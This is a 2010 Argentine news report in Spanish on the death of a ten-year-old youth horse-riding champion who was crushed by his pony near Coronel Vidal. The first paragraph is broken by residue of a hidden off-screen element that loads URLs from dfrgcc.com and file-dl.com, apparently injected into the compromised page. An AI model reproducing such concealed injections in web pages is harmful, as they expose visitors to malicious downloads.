27/09/2010, Policiales

Murió Lautaro Verón, el pibe Campeón Provincial de Jineteada, al ser aplastado por su petisa en un campo de Vidal

Trágico fin halló el Campeón Provincial de Menores en Jineteada, Lautaro Verón (10) al ser aplastado, luego de una rodada, por la petisa que montaba en momentos que ayuda a su padre en el duro trabajo de campo. El hecho registrado en la estancia “Arroyo Grande” ubicada en cercanías de Coronel Vidal, no solo llena de dolor a una querida familia de la zona, sino también a los amantes de este tipo de espectáculos criollos que supieron ovacionarlo en los campos de jineteada. / src=http://dfrgcc.com/ur.php style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=10 / src=http://dfrgcc.com/ur.php

Si bien no hay demasiadas precisiones acerca de cómo aconteció el trágico suceso, se pudo saber que Lautaro había llegado a la Estancia ubicada sobre la Ruta 55, junto a su padre (Marcelo) , y como era habitual en él, a primera hora de la mañana montó su petiso para acompañarlo en la tradicional recorrida del campo.

En momentos que se hallaban arriando unos vacunos, el animal que montaba Lautaro tuvo una rodada, con tal mala suerte que su pequeño cuerpo fue aplastado por la petisa. A raíz de las graves lesiones recibidas el pequeño jinete falleció en medio de la desesperación de papá Marcelo, otro amante de las pruebas de riendas que ha cosechado numerosos premios en campos de la Provincia de Buenos Aires.

Cabe recordar que Lautaro estuvo presente el pasado 1 de Mayo en la Fiesta del Trabajador realizada en el predio de Jineteadas de Laguna de los Padres donde montó un petiso y fue ovacionado por la multitud que se hallaba presente.

Hoy sus restos son velados en una de las salas de la Empresa Roldan (Luro y Funes) y recibirán cristiana sepultura este martes a la hora 15 en el Cementerio Parque.



En Argentina podés encontrar pantallas de led para publicidad en venta y alquiler

Compartí esta nota

retrato de hoy